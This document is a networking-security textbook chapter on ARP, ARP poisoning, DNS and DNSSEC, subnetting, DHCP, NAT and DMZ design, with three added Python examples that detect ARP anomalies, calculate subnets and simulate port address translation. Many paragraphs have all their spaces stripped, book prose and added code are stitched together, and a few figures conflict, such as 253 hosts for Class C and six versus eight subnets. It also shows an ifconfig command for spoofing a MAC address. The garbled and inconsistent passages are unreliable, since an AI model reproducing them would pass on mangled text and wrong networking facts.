Maintainingalistofeverylocalsystem’sMACaddressisbothcostlyandtimeconsuming,andalthoughasystemmaystoreMACaddressestemporarilyforconvenience,inmanycasesthesendermustfindthedestinationMACaddressbeforesendinganypackets.Tofindanothersystem’sMACaddress,theAddressResolutionProtocol(ARP)isused.Essentially,thisisthecomputer’swayoffindingout“whoownstheblueconvertiblewithlicensenumber123JAK.”Inmostcases,systemsknowtheIPaddresstheywishtosendto,butnottheMACaddress.UsinganARPrequest,thesendingsystemwillsendoutaquery:Whois10.1.1.140?Thisbroadcastqueryisexaminedbyeverysystemonthelocalnetwork,butonlythesystemwhoseIPaddressis10.1.1.140willrespond.Thatsystemwillsendbackaresponsethatsays“I’m10.1.1.140andmyMACaddressis00:07:e9:7c:c8:aa.”Thesendingsystemwillthenformatthepacketfordeliveryanddropitonthenetworkmedia,stampedwiththeMACaddressofthedestinationworkstation.
MACaddressescanbe“spoofed”orfaked.Someoperatingsystemsallowuserswithadministrator-levelprivilegestoexplicitlysettheMACaddressfortheirnetworkcard(s).Forexample,inLinuxoperatingsystemsyoucanusetheifconfigcommandtochangeanetworkadapter’sMACaddress.Thecommandifconfigeth0hwether00:07:e9:7c:c8:aawillsettheMACaddressofadaptereth0to00:07:e9:7c:c8:aa.TherearealsoanumberofsoftwareutilitiesthatallowyoutodothisthroughaGUI,suchastheGNUMACChanger.GUIutilitiestochangeMACaddressesonWindowssystemsarealsoavailable.
CrossCheckMandatoryAccessControlvs.MediaAccessControlInChapter2youlearnedaboutadifferentMAC—mandatoryaccesscontrol.WhatisthedifferencebetweenmandatoryaccesscontrolandMediaAccessControl?Whatiseachusedfor?Whenusingacronymsitcanbecriticaltoensureallpartiesareawareofthecontextoftheirusage.
ARPAttacksARPoperatesinasimplisticandefficientmanner—abroadcastrequestfollowedbyaunicastreply.ThismethodleavesARPopentoattack,whichinturncanresultinlossesofintegrity,confidentiality,andavailability.BecauseARPservestoestablishcommunicationchannels,failuresatthislevelcanleadtosignificantsystemcompromises.ThereisawiderangeofARP-specificattacks,butonecanclassifythemintotypesbasedoneffect.
TechTip
RogueDeviceDetectionThereisalwaysariskofarogue(unauthorized)devicebeinginsertedintothenetwork.Todetectwhenthishappens,maintainingalistofallauthorizedMACaddressescanhelpdetectthesedevices.AlthoughMACscanbecopiedandspoofed,thiswouldalsosetupaconflictif
theoriginaldevicewaspresent.Monitoringfortheseconditionscandetecttheinsertionofaroguedevice.
ARPcanbeavectoremployedtoachieveaman-in-the-middleattack.Therearemanyspecificwaystocreatefalseentriesinamachine’sARPcache,buttheeffectisthesame:communicationswillberoutedtoanattacker.ThistypeofattackiscalledARPpoisoning.Theattackercanusethismethodtoinjecthimselfintothemiddleofacommunication,hijackasession,snifftraffictoobtainpasswordsorothersensitiveitems,orblocktheflowofdata,creatingadenialofservice.AlthoughARPisnotsecure,allisnotlostwithmanyARP-based
attacks.Higher-levelpacketprotectionssuchasIPseccanbeemployedsothatthepacketsareunreadablebyinterlopers.ThisisoneofthesecuritygainsassociatedwithIPv6,becausewhensecurityisemployedattheIPseclevel,packetsareprotectedbelowtheIPlevel,makingLayer2attackslesssuccessful.
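The Rogue Device Detection tip and the ARP poisoning discussion above both come down to watching the ARP table for conflicts. The following added example (not from the book) parses the Windows arp -a output format used in the Try This exercise, compares two snapshots, and checks MACs against an authorized inventory; all snapshot data and the inventory are constructed for the example.

```python
# Added example (not from the book): a small ARP-table monitor in the spirit of
# the Rogue Device Detection Tech Tip. It parses the output format of the
# Windows "arp -a" command used in the Try This exercise, compares two
# snapshots, and checks MACs against an authorized inventory. All sample data
# below is constructed for the example.
import re
from typing import Dict, List, Set

# Constructed "arp -a" snapshot: gateway 10.1.1.1 has the book's example MAC.
ARP_SNAPSHOT_BEFORE = """
Interface: 10.1.1.140 --- 0xb
  Internet Address      Physical Address      Type
  10.1.1.1              00-07-e9-7c-c8-aa     dynamic
  10.1.1.25             00-50-56-aa-bb-01     dynamic
  10.1.1.255            ff-ff-ff-ff-ff-ff     static
"""

# Constructed later snapshot: the gateway's MAC has changed, and the same new
# MAC is now also answering for a second IP (the classic poisoning symptom).
ARP_SNAPSHOT_AFTER = """
Interface: 10.1.1.140 --- 0xb
  Internet Address      Physical Address      Type
  10.1.1.1              00-50-56-aa-bb-99     dynamic
  10.1.1.25             00-50-56-aa-bb-01     dynamic
  10.1.1.77             00-50-56-aa-bb-99     dynamic
  10.1.1.255            ff-ff-ff-ff-ff-ff     static
"""

# Hypothetical inventory of authorized MACs (the list the Tech Tip recommends).
AUTHORIZED_MACS: Set[str] = {"00:07:e9:7c:c8:aa", "00:50:56:aa:bb:01"}

# One table row: IPv4 address, MAC (Windows '-' or Unix ':' separators), type.
_ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)"
)
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"


def normalize_mac(mac: str) -> str:
    """Lower-case, colon-separated form so Windows and Unix output compare equal."""
    return mac.lower().replace("-", ":")


def parse_arp_table(text: str) -> Dict[str, str]:
    """Map IP -> MAC for every unicast entry in an 'arp -a' listing."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        match = _ENTRY.match(line)
        if not match:
            continue  # interface header, column header, blank line
        ip, mac, _type = match.groups()
        mac = normalize_mac(mac)
        if mac == BROADCAST_MAC:
            continue
        table[ip] = mac
    return table


def find_anomalies(before: Dict[str, str], after: Dict[str, str],
                   authorized: Set[str]) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings: List[str] = []

    # 1. An IP whose MAC differs from the earlier snapshot: possible ARP poisoning
    #    or a rogue device taking over an address.
    for ip, mac in after.items():
        old = before.get(ip)
        if old is not None and old != mac:
            findings.append(f"mac-changed {ip}: {old} -> {mac}")

    # 2. One MAC answering for several IPs: a single card claiming to be both
    #    the gateway and another host is the man-in-the-middle signature.
    ips_by_mac: Dict[str, List[str]] = {}
    for ip, mac in after.items():
        ips_by_mac.setdefault(mac, []).append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(f"duplicate-mac {mac}: {','.join(sorted(ips))}")

    # 3. A MAC that is not in the authorized inventory: unknown (rogue) device.
    for ip, mac in after.items():
        if mac not in authorized:
            findings.append(f"unauthorized-mac {ip}: {mac}")

    return findings


if __name__ == "__main__":
    before = parse_arp_table(ARP_SNAPSHOT_BEFORE)
    after = parse_arp_table(ARP_SNAPSHOT_AFTER)
    for finding in find_anomalies(before, after, AUTHORIZED_MACS):
        print(finding)
```

A MAC changing on the default gateway's IP is the finding worth alerting on first; the same check run on Linux output works because the parser accepts both separator styles.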
Remote Packet Delivery

While packet delivery on a LAN is usually accomplished with MAC addresses, packet delivery to a distant system is usually accomplished using Internet Protocol (IP) addresses. IP addresses are 32-bit numbers that usually are expressed as a group of four numbers (such as 10.1.1.132). In order to send a packet to a specific system on the other side of the world, you have to know the remote system's IP address. Storing large numbers of IP addresses on every PC is far too costly, and most humans are not good at remembering collections of numbers. However, humans are good at remembering names, so the Domain Name System (DNS) protocol was created.

DNS

DNS translates names into IP addresses. When you enter the name of your favorite website into the location bar of your web browser and press ENTER, the computer has to figure out what IP address belongs to that name. Your computer takes the entered name and sends a query to a local DNS server. Essentially, your computer asks the DNS server, "What IP address goes with www.myfavoritesite.com?" The DNS server, whose main purpose in life is to handle DNS queries, looks in its local records to see if it knows the answer. If it doesn't, the DNS server queries another, higher-level domain server. That server checks its records and queries the server above it, and so on until a match is found. That name-to-IP address matching is passed back down to your computer so it can create the web request, stamp it with the right destination IP address, and send it.

The Domain Name System is critical to the operation of the Internet—if your computer can't translate www.espn.com into 68.71.212.159, then your web browser won't be able to access the latest scores. (As DNS is a dynamic system, the IP address may change for www.espn.com; you can check with the tracert command.)

Before sending the packet, your system will first determine if the destination IP address is on a local or remote network. In most cases, it will be on a remote network and your system will not know how to reach that remote network. Again, it would not be practical for your system to know how to directly reach every other system on the Internet, so your system will forward the packet to a network gateway. Network gateways, usually called routers, are devices that are used to interconnect networks and move packets from one network to another. That process of moving packets from one network to another is called routing and is critical to the flow of information across the Internet. To accomplish this task, routers use forwarding tables to determine where a packet should go. When a packet reaches a router, the router looks at the destination address to determine where to send the packet. If the router's forwarding tables indicate where the packet should go, the router sends the packet out along the appropriate route. If the router does not know where the destination network is, it forwards the packet to its defined gateway, which repeats the same process. Eventually, after traversing various networks and being passed through various routers, your packet arrives at the router serving the network with the website you are trying to reach. This router determines the appropriate MAC address of the destination system and forwards the packet accordingly.

DNSSEC

Because of the critical function DNS performs and the security implications of DNS, a cryptographically signed version of DNS was created. DNSSEC is an extension of the original DNS specification, making it trustworthy. DNS is one of the pillars of authority associated with the Internet—it provides the addresses used by machines for communications. Lack of trust in DNS and the inability to authenticate DNS messages drove the need for and creation of DNSSEC. The DNSSEC specification was formally published in 2005, but system-wide adoption has been slow. In 2008, Dan Kaminsky introduced a method of DNS cache poisoning, demonstrating the need for DNSSEC adoption. Although Kaminsky worked with virtually all major vendors and was behind one of the most coordinated patch rollouts ever, the need for DNSSEC still remains and enterprises are slow to adopt the new methods. One of the reasons for slow adoption is complexity. Having DNS requests and replies digitally signed requires significantly more work, and the increase in complexity goes against the stability desires of network engineers. DNS was designed in the 1980s when the threat model was substantially different than today. The Internet today, and its use for all kinds of critical communications, needs a trustworthy addressing mechanism. DNSSEC is that mechanism, and as it rolls out, it will significantly increase the level of trust associated with addresses. Although certificate-based digital signatures are not perfect, the level of effort to compromise this type of protection mechanism changes the nature of the attack game, making it out of reach to all but the most resourced players. The coupled nature of the trust chains in DNS also serves to alert to any intervening attacks, making attacks much harder to hide.

Tech Tip
How DNS Works
DNS is a hierarchical distributed database structure of names and addresses. This system is delegated from root servers to other DNS servers that each manage local requests for information. The top level of authorities, referred to as authoritative sources, maintain the correct authoritative record. As records change, they are pushed out between DNS servers, so records can be maintained in as near a current fashion as possible. Transfers of DNS records between DNS servers are called DNS zone transfers. Because these can result in massive poisoning attacks, zone transfers need to be tightly controlled between trusted parties. To avoid request congestion, DNS responses are handled by a myriad of lower name servers, referred to as resolvers. Resolvers have a counter that refreshes their record after a time limit has been reached. Under normal operation, the DNS function is a two-step process:
1. The client requests a DNS record.
2. The resolver replies with a DNS reply.
If the resolver is out of date, the steps expand:
1. The client requests a DNS record.
2. The recursive resolver queries the authoritative server.
3. The authoritative server replies to the recursive resolver.
4. The recursive resolver replies with a DNS response to the client.
For a more detailed explanation of DNS, check out DNS for Rocket Scientists, www.zytrax.com/books/dns/.

IP Addresses and Subnetting

The last section mentioned that IPv4 addresses are 32-bit numbers. Those 32 bits are represented as four groups of 8 bits each (called octets). You will usually see IP addresses expressed as four sets of decimal numbers in dotted-decimal notation, 10.120.102.15 for example. Of those 32 bits in an IP address, some are used for the network portion of the address (the network ID), and some are used for the host portion of the address (the host ID). Subnetting is the process that is used to divide those 32 bits in an IP address and tell you how many of the 32 bits are being used for the network ID and how many are being used for the host ID. As you can guess, where and how you divide the 32 bits determines how many networks and how many host addresses you may have. To interpret the 32-bit space correctly, we must use a subnet mask, which tells us exactly how much of the space is the network portion and how much is the host portion. Let's look at an example using the IP address 10.10.10.101 with a subnet mask of 255.255.255.0.

First we must convert the address and subnet mask to their binary representations:

Subnet Mask: 11111111.11111111.11111111.00000000
IP Address:  00001010.00001010.00001010.01100101

Then, we perform a bitwise AND operation to get the network address. The bitwise AND operation examines each set of matching bits from the binary representation of the subnet mask and the binary representation of the IP address. For each set where both the mask and address bits are 1, the result of the AND operation is a 1. Otherwise, if either bit is a 0, the result is a 0. So, for our example we get

Network Address: 00001010.00001010.00001010.00000000

which in decimal is 10.10.10.0, the network ID of our IP network address (translate the binary representation to decimal). The network ID and subnet mask together tell us that the first three octets of our address are network-related (10.10.10.), which means that the last octet of our address is the host portion (101 in this case). In our example, the network portion of the address is 10.10.10 and the host portion is 101. Another shortcut in identifying which of the 32 bits is being used in the network ID is to look at the subnet mask after it's been converted to its binary representation. If there's a 1 in the subnet mask, then the corresponding bit in the binary representation of the IP address is being used as part of the network ID. In the preceding example, the subnet mask of 255.255.255.0 in binary representation is 11111111.11111111.11111111.00000000. We can see that there's a 1 in the first 24 spots, which means that the first 24 bits of the IP address are being used as the network ID (which is the first three octets of 255.255.255). Network address spaces are usually divided into one of three classes:

Class A Supports 16,777,214 hosts on each network with a default subnet mask of 255.0.0.0. Subnets: 0.0.0.0 to 126.255.255.255 (127.0.0.0 to 127.255.255.255 is reserved for loopback)

Class B Supports 65,534 hosts on each network with a default subnet mask of 255.255.0.0. Subnets: 128.0.0.0 to 191.255.255.255

Class C Supports 253 hosts on each network with a default subnet mask of 255.255.255.0 (see Figure 9.10). Subnets: 192.0.0.0 to 223.255.255.255

• Figure 9.10 A subnet mask of 255.255.255.0 indicates this is a Class C address space.

Everything above 224.0.0.0 is reserved for either multicasting or future use.

In addition, certain subnets are reserved for private use and are not routed across public networks such as the Internet:

10.0.0.0 to 10.255.255.255
172.16.0.0 to 172.31.255.255
192.168.0.0 to 192.168.255.255
169.254.0.0 to 169.254.255.255 (Automatic Private IP Addressing)

Tech Tip
RFC 1918—Private Address Spaces
RFC 1918 is the technical specification for private address space. RFC stands for "Request for Comment" and there are RFCs for just about everything to do with the Internet—protocols, routing, how to handle e-mail, and so on. You can find RFCs at www.ietf.org/rfc.html.

Finally, when determining the valid hosts that can be placed on a particular subnet, you have to keep in mind that the "all 0's" address of the host portion is reserved for the network address and the "all 1's" address of the host portion is reserved for the broadcast address of that particular subnet. Again from our earlier example:

Subnet Network Address: 10.10.10.0    00001010.00001010.00001010.00000000
Broadcast Address:      10.10.10.255  00001010.00001010.00001010.11111111

In their forwarding tables, routers maintain lists of networks and the accompanying subnet mask. With these two pieces, the router can examine the destination address of each packet and then forward the packet on to the appropriate destination. As mentioned earlier, subnetting allows us to divide networks into smaller logical units, and we use subnet masks to do this. But how does this work? Remember that the subnet mask tells us how many bits are being used to describe the network ID—adjusting the subnet mask (and the number of bits used to describe the network ID) allows us to divide an address space into multiple, smaller logical networks. Let's say you have a single address space of 192.168.45.0 that you need to divide into multiple networks. The default subnet mask is 255.255.255.0, which means you're using 24 bits as the network ID and 8 bits as the host ID. This gives you 254 different host addresses. But what if you need more networks and don't need as many host addresses? You can simply adjust your subnet mask to borrow some of the host bits and use them as network bits. If you use a subnet mask of 255.255.255.224, you are essentially "borrowing" the first 3 bits from the space you were using to describe host IDs and using them to describe the network ID. This gives you more space to create different networks but means that each network will now have fewer available host IDs. With a 255.255.255.224 subnet mask, you can create six different subnets, but each subnet can only have 30 unique host IDs. If you borrow 6 bits from the host ID portion and use a subnet mask of 255.255.255.252, you can create 62 different networks but each of them can only have two unique host IDs.

Try This! Calculating Subnets and Hosts
Given a network ID of 192.168.10.X and a subnet mask of 255.255.255.224, you should be able to create eight networks with space for 30 hosts on each network. Calculate the network address, the first usable IP address in that subnet, and the last usable IP address in that subnet. Hint: The first network will be 192.168.10.0. The first usable IP address in that subnet is 192.168.10.1 and the last usable IP address in that subnet is 192.168.10.30.
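The subnet arithmetic of this section (binary conversion, the bitwise AND, network and broadcast addresses, and borrowing host bits) carried through in code, as an added example that is not from the book. It uses only bit operations so that each step mirrors the text, and it generalizes the Try This exercise: given any network, original mask, and new mask it lists every resulting subnet, counting all blocks including the all-zeros and all-ones subnets as the exercise does (eight for 255.255.255.224).

```python
# Added example (not from the book): the subnetting arithmetic of this section
# done by hand with bit operations, so each step mirrors the binary AND shown
# above. Python's ipaddress module would do the same but would hide the steps.
from typing import List, Tuple


def ip_to_int(dotted: str) -> int:
    """Parse dotted-decimal IPv4 ('10.10.10.101') into a 32-bit integer."""
    octets = [int(o) for o in dotted.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"bad IPv4 address: {dotted}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def int_to_ip(value: int) -> str:
    """Inverse of ip_to_int."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def to_binary(dotted: str) -> str:
    """Dotted binary form, e.g. 00001010.00001010.00001010.01100101."""
    return ".".join(f"{int(o):08b}" for o in dotted.split("."))


def mask_bits(mask: str) -> int:
    """Number of leading 1-bits in a subnet mask (255.255.255.224 -> 27).
    A valid mask is a run of 1s followed by a run of 0s; anything else is rejected."""
    m = ip_to_int(mask)
    ones = bin(m).count("1")
    if m != (0xFFFFFFFF << (32 - ones)) & 0xFFFFFFFF:
        raise ValueError(f"non-contiguous subnet mask: {mask}")
    return ones


def network_address(ip: str, mask: str) -> str:
    """Bitwise AND of address and mask: the 'all 0s' host address."""
    return int_to_ip(ip_to_int(ip) & ip_to_int(mask))


def broadcast_address(ip: str, mask: str) -> str:
    """Network address with every host bit set: the 'all 1s' host address."""
    host_bits = 32 - mask_bits(mask)
    return int_to_ip(ip_to_int(network_address(ip, mask)) | ((1 << host_bits) - 1))


def usable_hosts(mask: str) -> int:
    """Host addresses per subnet, less the network and broadcast addresses."""
    host_bits = 32 - mask_bits(mask)
    return max((1 << host_bits) - 2, 0)


def subnets(network: str, original_mask: str,
            new_mask: str) -> List[Tuple[str, str, str, str]]:
    """Borrow host bits from original_mask to reach new_mask and list every
    resulting subnet as (network, first usable, last usable, broadcast).
    All 2**borrowed blocks are listed, including the all-zeros and all-ones
    subnets, as in the Try This exercise (8 subnets for 255.255.255.224)."""
    borrowed = mask_bits(new_mask) - mask_bits(original_mask)
    if borrowed < 1:
        raise ValueError("new mask must borrow at least one host bit")
    block = 1 << (32 - mask_bits(new_mask))  # addresses per subnet
    base = ip_to_int(network_address(network, original_mask))
    result = []
    for i in range(1 << borrowed):
        net = base + i * block
        result.append((int_to_ip(net), int_to_ip(net + 1),
                       int_to_ip(net + block - 2), int_to_ip(net + block - 1)))
    return result


if __name__ == "__main__":
    ip, mask = "10.10.10.101", "255.255.255.0"
    print("Subnet Mask:    ", to_binary(mask))
    print("IP Address:     ", to_binary(ip))
    print("Network Address:", to_binary(network_address(ip, mask)), "=", network_address(ip, mask))
    print("Broadcast:      ", broadcast_address(ip, mask))
    for row in subnets("192.168.10.0", "255.255.255.0", "255.255.255.224"):
        print("subnet %-15s first %-15s last %-15s broadcast %s" % row)
```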
Tech Tip
Dynamic Host Configuration Protocol
When an administrator sets up a network, they usually assign IP addresses to systems in one of two ways: statically or through DHCP. A static IP address assignment is fairly simple; the administrator decides what IP address to assign to a server or PC, and that IP address stays assigned to that system until the administrator decides to change it. The other popular method is through the Dynamic Host Configuration Protocol (DHCP). Under DHCP, when a system boots up or is connected to the network, it sends out a query looking for a DHCP server. If a DHCP server is available on the network, it answers the new system and temporarily assigns to the new system an IP address from a pool of dedicated, available addresses. DHCP is an "as available" protocol—if the server has already allocated all the available IP addresses in the DHCP pool, the new system will not receive an IP address and will not be able to connect to the network. Another key feature of DHCP is the ability to limit how long a system may keep its DHCP-assigned IP address. DHCP addresses have a limited lifespan, and once that time period expires, the system using that IP address must either renew use of that address or request another address from the DHCP server. The requesting system either may end up with the same IP address or may be assigned a completely new address, depending on how the DHCP server is configured and on the current demand for available addresses. DHCP is very popular in large user environments where the cost of assigning and tracking IP addresses among hundreds or thousands of user systems is extremely high.

Network Address Translation

If you're thinking that a 32-bit address space that's chopped up and subnetted isn't enough to handle all the systems in the world, you're right. While IPv4 address blocks are assigned to organizations such as companies and universities, there usually aren't enough Internet-visible IP addresses to assign to every system on the planet a unique, Internet-routable IP address. To compensate for this lack of available IP address space, we use Network Address Translation (NAT). NAT translates private (nonroutable) IP addresses into public (routable) IP addresses. From our discussions earlier in this chapter, you may remember that certain IP address blocks are reserved for "private use," and you'd probably agree that not every system in an organization needs a direct, Internet-routable IP address. Actually, for security reasons, it's much better if most of an organization's systems are hidden from direct Internet access. Most organizations build their internal networks using the private IP address ranges (such as 10.1.1.X) to prevent outsiders from directly accessing those internal networks. However, in many cases those systems still need to be able to reach the Internet. This is accomplished by using a NAT device (typically a firewall or router) that translates the many internal IP addresses into one of a small number of public IP addresses. For example, consider a fictitious company, ACME.com. ACME has several thousand internal systems using private IP addresses in the 10.X.X.X range. To allow those IPs to communicate with the outside world, ACME leases an Internet connection and a few public IP addresses, and deploys a NAT-capable device. ACME administrators configure all their internal hosts to use the NAT device as their default gateway. When internal hosts need to send packets outside the company, they send them to the NAT device. The NAT device removes the internal source IP address from the outbound packets, replaces it with the NAT device's public, routable address, and sends them on their way. When response packets are received from outside sources, the device performs NAT in reverse, stripping off the external, public IP address in the destination address field and replacing it with the correct internal, private IP address before sending the packet on into the private ACME.com network. Figure 9.11 illustrates this NAT process.

• Figure 9.11 Logical depiction of NAT

Tech Tip
Different Approaches for Implementing NAT
While the concept of NAT remains the same, there are actually several different approaches to implementing NAT. For example:

Static NAT Maps an internal, private address to an external, public address. The same public address is always used for that private address. This technique is often used when hosting something you wish the public to be able to get to, such as a web server, behind a firewall.

Dynamic NAT Maps an internal, private IP address to a public IP address selected from a pool of registered (public) IP addresses. This technique is often used when translating addresses for end-user workstations, and the NAT device must keep track of internal/external address mappings.

Port Address Translation (PAT) Allows many different internal, private addresses to share a single external IP address. Devices performing PAT replace the source IP address with the NAT IP address and replace the source port field with a port from an available connection pool. PAT devices keep a translation table to track which internal hosts are using which ports so that subsequent packets can be stamped with the same port number. When response packets are received, the PAT device reverses the process and forwards the packet to the correct internal host. PAT is a very popular NAT technique and is in use at many organizations.

In Figure 9.11, we see an example of NAT being performed. An internal workstation (10.10.10.12) wants to visit the ESPN website at www.espn.com (68.71.212.159). When the packet reaches the NAT device, the device translates the 10.10.10.12 source address to the globally routable 63.69.110.110 address, the IP address of the device's externally visible interface. When the ESPN website responds, it responds to the device's address just as if the NAT device had originally requested the information. The NAT device must then remember which internal workstation requested the information and route the packet to the appropriate destination.
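The Figure 9.11 exchange and the PAT translation table from the Tech Tip, modelled in code as an added example that is not from the book. The IP addresses are the ones in the text (10.10.10.12, 63.69.110.110, 68.71.212.159); the port numbers, the pool size, and the Packet and PatDevice names are constructed for the example.

```python
# Added example (not from the book): a toy Port Address Translation device
# modelling the Figure 9.11 exchange. The addresses are the book's
# (10.10.10.12 inside, 63.69.110.110 public, 68.71.212.159 for www.espn.com);
# the port numbers and the pool size are constructed for the example.
from dataclasses import dataclass, replace
from typing import Dict, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str = "tcp"


class PatDevice:
    """Many private sources share one public IP; each flow gets its own public port."""

    def __init__(self, public_ip: str, first_port: int = 40000, pool_size: int = 4):
        self.public_ip = public_ip
        self.free_ports = list(range(first_port, first_port + pool_size))
        # (proto, public port) -> (private ip, private port): consulted for replies
        self.table: Dict[Tuple[str, int], Tuple[str, int]] = {}
        # (proto, private ip, private port) -> public port: reuses a flow's mapping
        self.reverse: Dict[Tuple[str, str, int], int] = {}

    def outbound(self, pkt: Packet) -> Optional[Packet]:
        """Rewrite source IP/port of a packet leaving the private network.
        Returns None (dropped) when the port pool is exhausted."""
        key = (pkt.proto, pkt.src_ip, pkt.src_port)
        port = self.reverse.get(key)
        if port is None:
            if not self.free_ports:
                return None
            port = self.free_ports.pop(0)
            self.reverse[key] = port
            self.table[(pkt.proto, port)] = (pkt.src_ip, pkt.src_port)
        return replace(pkt, src_ip=self.public_ip, src_port=port)

    def inbound(self, pkt: Packet) -> Optional[Packet]:
        """Reverse the translation for a reply. A packet for a port with no
        mapping has no internal host to go to and is dropped: this is why
        hosts behind PAT are not directly reachable from the outside."""
        if pkt.dst_ip != self.public_ip:
            return None
        entry = self.table.get((pkt.proto, pkt.dst_port))
        if entry is None:
            return None
        private_ip, private_port = entry
        return replace(pkt, dst_ip=private_ip, dst_port=private_port)


if __name__ == "__main__":
    nat = PatDevice("63.69.110.110")
    request = Packet("10.10.10.12", 51234, "68.71.212.159", 80)
    out = nat.outbound(request)
    print("outbound:", request, "->", out)
    reply = Packet("68.71.212.159", 80, out.src_ip, out.src_port)
    print("inbound: ", reply, "->", nat.inbound(reply))
    print("unsolicited:", nat.inbound(Packet("68.71.212.159", 80, "63.69.110.110", 40003)))
```

Static NAT is the degenerate case of this table with one fixed entry per host; dynamic NAT swaps the port pool for a pool of public addresses.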
SecurityZonesThefirstaspectofsecurityisalayereddefense.Justasacastlehasamoat,anoutsidewall,aninsidewall,andevenakeep,so,too,doesamodernsecurenetworkhavedifferentlayersofprotection.Differentzonesaredesignedtoprovidelayersofdefense,withtheoutermostlayersprovidingbasicprotectionandtheinnermostlayersprovidingthehighestlevelofprotection.Aconstantissueisthataccessibilitytendstobeinverselyrelatedtolevelofprotection,soitismoredifficulttoprovidecompleteprotectionandunfetteredaccessatthesametime.Trade-offsbetweenaccessandsecurityarehandledthroughzones,withsuccessivezonesguardedbyfirewallsenforcingever-increasinglystrictsecuritypolicies.TheoutermostzoneistheInternet,afreearea,beyondanyspecificcontrols.Betweentheinner,securecorporatenetworkandtheInternetisanareawheremachinesareconsideredatrisk.ThiszonehascometobecalledtheDMZ,afteritsmilitarycounterpart,thedemilitarizedzone,
whereneithersidehasanyspecificcontrols.Onceinsidetheinner,securenetwork,separatebranchesarefrequentlycarvedouttoprovidespecificfunctionality;underthisheading,wewillalsodiscussintranets,extranets,flatnetworks,enclaves,virtualLANs(VLANs),andzonesandconduits.
DMZTheDMZisamilitarytermforgroundseparatingtwoopposingforces,byagreementandforthepurposeofactingasabufferbetweenthetwosides.ADMZinacomputernetworkisusedinthesameway;itactsasabufferzonebetweentheInternet,wherenocontrolsexist,andtheinner,securenetwork,whereanorganizationhassecuritypoliciesinplace(seeFigure9.12).Todemarcatethezonesandenforceseparation,afirewallisusedoneachsideoftheDMZ.Theareabetweenthesefirewallsisaccessiblefromeithertheinner,securenetworkortheInternet.Figure9.12illustratesthesezonesascausedbyfirewallplacement.ThefirewallsarespecificallydesignedtopreventaccessacrosstheDMZdirectly,fromtheInternettotheinner,securenetwork.ItisimportanttonotethattypicallyonlyfilteredInternettrafficisallowedintotheDMZ.Forexample,anorganizationhostingawebserverandanFTPserverinitsDMZmaywantthepublictobeableto“see”thoseservicesbutnothingelse.InthatcasethefirewallmayallowFTP,HTTP,andHTTPStrafficintotheDMZfromtheInternetandthenfilterouteverythingelse.
•Figure9.12TheDMZandzonesoftrust
SpecialattentionshouldbepaidtothesecuritysettingsofnetworkdevicesplacedintheDMZ,andtheyshouldbeconsideredatalltimestobeatriskforcompromisebyunauthorizeduse.Acommonindustryterm,hardenedoperatingsystem,appliestomachineswhosefunctionalityislockeddowntopreservesecurity—unnecessaryservicesandsoftwareareremovedordisabled,functionsarelimited,andsoon.ThisapproachneedstobeappliedtothemachinesintheDMZ,andalthoughitmeansthattheirfunctionalityislimited,suchprecautionsensurethatthemachineswillworkproperlyinaless-secureenvironment.Manytypesofserversbelonginthisarea,includingwebserversthatare
servingcontenttoInternetusers,aswellasremoteaccessserversandexternale-mailservers.Ingeneral,anyserverdirectlyaccessedfromtheoutside,untrustedInternetzoneneedstobeintheDMZ.OtherserversshouldnotbeplacedintheDMZ.Domainnameserversforyourinner,
trustednetworkanddatabaseserversthathousecorporatedatabasesshouldnotbeaccessiblefromtheoutside.Applicationservers,fileservers,printservers—allofthestandardserversusedinthetrustednetwork—shouldbebehindbothfirewallsandtheroutersandswitchesusedtoconnectthesemachines.TheideabehindtheuseoftheDMZtopologyistoprovidepublicly
visibleserviceswithoutallowinguntrustedusersaccesstoyourinternalnetwork.Iftheoutsideusermakesarequestforaresourcefromthetrustednetwork,suchasadataelementfromaninternaldatabasethatisaccessedviaapubliclyvisiblewebpageintheDMZ,thenthisrequestneedstofollowthisscenario:
1.Auserfromtheuntrustednetwork(theInternet)requestsdataviaawebpagefromawebserverintheDMZ.
2.ThewebserverintheDMZrequeststhedatafromtheapplicationserver,whichcanbeintheDMZorintheinner,trustednetwork.
3.Theapplicationserverrequeststhedatafromthedatabaseserverinthetrustednetwork.
4.Thedatabaseserverreturnsthedatatotherequestingapplicationserver.
5.Theapplicationserverreturnsthedatatotherequestingwebserver.6.Thewebserverreturnsthedatatotherequestinguserfromthe
untrustednetwork.
ExamTip:DMZsactasabufferzonebetweenunprotectedareasofanetwork(theInternet)andprotectedareas(sensitivecompanydatastores),allowingforthemonitoringandregulationoftrafficbetweenthesetwozones.
Thisseparationaccomplishestwospecific,independenttasks.First,theuserisseparatedfromtherequestfordataonasecurenetwork.Byhaving
intermediariesdotherequesting,thislayeredapproachallowssignificantsecuritylevelstobeenforced.Usersdonothavedirectaccessorcontrolovertheirrequests,andthisfilteringprocesscanputcontrolsinplace.Second,scalabilityismoreeasilyrealized.Themultiple-serversolutioncanbemadetobeveryscalable,literallytomillionsofusers,withoutslowingdownanyparticularlayer.
InternetTheInternetisaworldwideconnectionofnetworksandisusedtotransporte-mail,files,financialrecords,remoteaccess—younameit—fromonenetworktoanother.TheInternetisnotasinglenetwork,butaseriesofinterconnectednetworksthatallowsprotocolstooperateandenabledatatoflowacrossit.Thismeansthatevenifyournetworkdoesn’thavedirectcontactwitharesource,aslongasaneighbor,oraneighbor’sneighbor,andsoon,cangetthere,socanyou.Thislargeweballowsusersalmostinfiniteabilitytocommunicatebetweensystems.
Thereareover3.2billionusersontheInternet,andEnglishisthemostusedlanguage.
